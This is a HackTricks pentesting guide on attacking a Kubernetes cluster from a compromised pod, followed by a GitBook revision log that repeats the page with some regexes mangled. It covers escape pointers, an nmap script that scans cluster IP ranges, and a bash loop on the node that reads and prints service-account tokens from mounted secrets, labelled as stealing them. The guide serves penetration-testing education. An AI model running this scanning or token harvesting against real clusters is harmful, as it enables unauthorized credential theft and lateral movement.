hacktricks/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md

# Attacking Kubernetes from inside a Pod

## **Pod Breakout**

**If you are lucky enough you may be able to escape from it to the node:**

![](https://sickrov.github.io/media/Screenshot-161.jpg)

### Escaping from the pod

In order to try to escape from the pos you might need to **escalate privileges** first, some techniques to do it:

{% content-ref url="../../linux-unix/privilege-escalation/" %}
[privilege-escalation](../../linux-unix/privilege-escalation/)
{% endcontent-ref %}

You can check this **docker breakouts to try to escape** from a pod you have compromised:

{% content-ref url="../../linux-unix/privilege-escalation/docker-breakout/" %}
[docker-breakout](../../linux-unix/privilege-escalation/docker-breakout/)
{% endcontent-ref %}

### Abusing Kubernetes Privileges

As explained in the section about **kubernetes enumeration**:

{% content-ref url="enumeration-from-a-pod.md" %}
[enumeration-from-a-pod.md](enumeration-from-a-pod.md)
{% endcontent-ref %}

Usually the pods are run with a **service account token** inside of them. This service account may have some **privileges attached to it** that you could **abuse** to **move** to other pods or even to **escape** to the nodes configured inside the cluster. Check how in:

{% content-ref url="hardening-roles-clusterroles.md" %}
[hardening-roles-clusterroles.md](hardening-roles-clusterroles.md)
{% endcontent-ref %}

### Abusing Cloud Privileges

If the pod is run inside a **cloud environment** you might be able to l**eak a token from the metadata endpoint** and escalate privileges using it.

## Search vulnerable network services

As you are inside the Kubernetes environment, if you cannot escalate privileges abusing the current pods privileges and you cannot escape from the container, you should **search potential vulnerable services.**

### Services

**For this purpose, you can try to get all the services of the kubernetes environment:**

```
kubectl get svc --all-namespaces
```

### Scanning

The following Bash script (taken from a [Kubernetes workshop](https://github.com/calinah/learn-by-hacking-kccn/blob/master/k8s\_cheatsheet.md)) will install and scan the IP ranges of the kubernetes cluster:

```bash
sudo apt-get update
sudo apt-get install nmap
nmap-kube () 
{ 
    nmap --open -T4 -A -v -Pn -p 80,443,2379,8080,9090,9100,9093,4001,6782-6784,6443,8443,9099,10250,10255,10256 "${@}"
}

nmap-kube-discover () {
    local LOCAL_RANGE=$(ip a | awk '/eth0$/{print $2}' | sed 's,[0-9][0-9]*/.*,*,');                                                                  
    local SERVER_RANGES=" ";
    SERVER_RANGES+="10.0.0.1 ";
    SERVER_RANGES+="10.0.1.* ";
    SERVER_RANGES+="10.*.0-1.* ";
    nmap-kube ${SERVER_RANGES} "${LOCAL_RANGE}"
}
nmap-kube-discover
```

Check out the following page to learn how you could **attack Kubernetes specific services** to **compromise other pods/all the environment**:

{% content-ref url="pentesting-kubernetes-from-the-outside.md" %}
[pentesting-kubernetes-from-the-outside.md](pentesting-kubernetes-from-the-outside.md)
{% endcontent-ref %}

### Sniffing

In case the **compromised pod is running some sensitive service** where other pods need to authenticate you might be able to obtain the credentials send from the other pods.

## Automatic Tools

* [https://github.com/inguardians/peirates](https://github.com/inguardians/peirates)

## Node Post-Exploitation

If you managed to **escape from the container** there are some interesting things you will find in the node:

* The **Container Runtime** process (Docker)
* More **pods/containers** running in the node you can abuse like this one (more tokens)
* The whole **filesystem** and **OS** in general
* The **Kube-Proxy** service listening
* The **Kubelet** service listening: Check `/var/lib/kubelet/` specially `/var/lib/kubelet/kubeconfig`

```bash
# Check Kubelet privileges
kubectl --kubeconfig /var/lib/kubelet/kubeconfig auth can-i create pod -n kube-system

# Steal the tokens from the pods running in the node
## The most interesting one is probably the one of kube-system
ALREADY="IinItialVaaluE"
for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do
    TOKEN=$(cat $(echo $i | sed 's/.namespace$/\/token/'))
    if ! [ $(echo $TOKEN | grep -E $ALREADY) ]; then
        ALREADY="$ALREADY|$TOKEN"
        echo "Directory: $i"
        echo "Namespace: $(cat $i)"
        echo ""
        echo $TOKEN
        echo "================================================================================"
        echo ""
    fi
done
```
GitBook: [#2907] No subject 2021-12-22 15:22:43 +00:00			`# Attacking Kubernetes from inside a Pod`

			`## Pod Breakout`

			`If you are lucky enough you may be able to escape from it to the node:`

			`![](https://sickrov.github.io/media/Screenshot-161.jpg)`

			`### Escaping from the pod`

			`In order to try to escape from the pos you might need to escalate privileges first, some techniques to do it:`

			`{% content-ref url="../../linux-unix/privilege-escalation/" %}`
			`[privilege-escalation](../../linux-unix/privilege-escalation/)`
			`{% endcontent-ref %}`

			`You can check this docker breakouts to try to escape from a pod you have compromised:`

			`{% content-ref url="../../linux-unix/privilege-escalation/docker-breakout/" %}`
			`[docker-breakout](../../linux-unix/privilege-escalation/docker-breakout/)`
			`{% endcontent-ref %}`

			`### Abusing Kubernetes Privileges`

			`As explained in the section about kubernetes enumeration:`

			`{% content-ref url="enumeration-from-a-pod.md" %}`
			`[enumeration-from-a-pod.md](enumeration-from-a-pod.md)`
			`{% endcontent-ref %}`

			`Usually the pods are run with a service account token inside of them. This service account may have some privileges attached to it that you could abuse to move to other pods or even to escape to the nodes configured inside the cluster. Check how in:`

			`{% content-ref url="hardening-roles-clusterroles.md" %}`
			`[hardening-roles-clusterroles.md](hardening-roles-clusterroles.md)`
			`{% endcontent-ref %}`

			`### Abusing Cloud Privileges`

			`If the pod is run inside a cloud environment you might be able to leak a token from the metadata endpoint and escalate privileges using it.`

			`## Search vulnerable network services`

			`As you are inside the Kubernetes environment, if you cannot escalate privileges abusing the current pods privileges and you cannot escape from the container, you should search potential vulnerable services.`

			`### Services`

			`For this purpose, you can try to get all the services of the kubernetes environment:`

			```
			`kubectl get svc --all-namespaces`
			```

			`### Scanning`

			`The following Bash script (taken from a [Kubernetes workshop](https://github.com/calinah/learn-by-hacking-kccn/blob/master/k8s\_cheatsheet.md)) will install and scan the IP ranges of the kubernetes cluster:`

			```bash
			`sudo apt-get update`
			`sudo apt-get install nmap`
			`nmap-kube ()`
			`{`
			`nmap --open -T4 -A -v -Pn -p 80,443,2379,8080,9090,9100,9093,4001,6782-6784,6443,8443,9099,10250,10255,10256 "${@}"`
			`}`

			`nmap-kube-discover () {`
			`local LOCAL_RANGE=$(ip a \| awk '/eth0$/{print $2}' \| sed 's,[0-9][0-9]/.,*,');`
			`local SERVER_RANGES=" ";`
			`SERVER_RANGES+="10.0.0.1 ";`
			`SERVER_RANGES+="10.0.1.* ";`
			`SERVER_RANGES+="10..0-1. ";`
			`nmap-kube ${SERVER_RANGES} "${LOCAL_RANGE}"`
			`}`
			`nmap-kube-discover`
			```

GitBook: [#2908] No subject 2021-12-22 17:43:14 +00:00			`Check out the following page to learn how you could attack Kubernetes specific services to compromise other pods/all the environment:`

			`{% content-ref url="pentesting-kubernetes-from-the-outside.md" %}`
			`[pentesting-kubernetes-from-the-outside.md](pentesting-kubernetes-from-the-outside.md)`
			`{% endcontent-ref %}`

GitBook: [#2907] No subject 2021-12-22 15:22:43 +00:00			`### Sniffing`

			`In case the compromised pod is running some sensitive service where other pods need to authenticate you might be able to obtain the credentials send from the other pods.`
GitBook: [#2909] No subject 2021-12-22 21:34:00 +00:00
			`## Automatic Tools`

			`* [https://github.com/inguardians/peirates](https://github.com/inguardians/peirates)`
GitBook: [#2911] No subject 2021-12-23 12:20:46 +00:00
			`## Node Post-Exploitation`

			`If you managed to escape from the container there are some interesting things you will find in the node:`

			`* The Container Runtime process (Docker)`
			`* More pods/containers running in the node you can abuse like this one (more tokens)`
			`* The whole filesystem and OS in general`
			`* The Kube-Proxy service listening`
			* The Kubelet service listening: Check `/var/lib/kubelet/` specially `/var/lib/kubelet/kubeconfig`

			```bash
			`# Check Kubelet privileges`
			`kubectl --kubeconfig /var/lib/kubelet/kubeconfig auth can-i create pod -n kube-system`

			`# Steal the tokens from the pods running in the node`
			`## The most interesting one is probably the one of kube-system`
			`ALREADY="IinItialVaaluE"`
			`for i in $(mount \| sed -n '/secret/ s/^tmpfs on \(.default.\) type tmpfs.*$/\1\/namespace/p'); do`
			`TOKEN=$(cat $(echo $i \| sed 's/.namespace$/\/token/'))`
			`if ! [ $(echo $TOKEN \| grep -E $ALREADY) ]; then`
			`ALREADY="$ALREADY\|$TOKEN"`
			`echo "Directory: $i"`
			`echo "Namespace: $(cat $i)"`
			`echo ""`
			`echo $TOKEN`
			`echo "================================================================================"`
			`echo ""`
			`fi`
			`done`
			```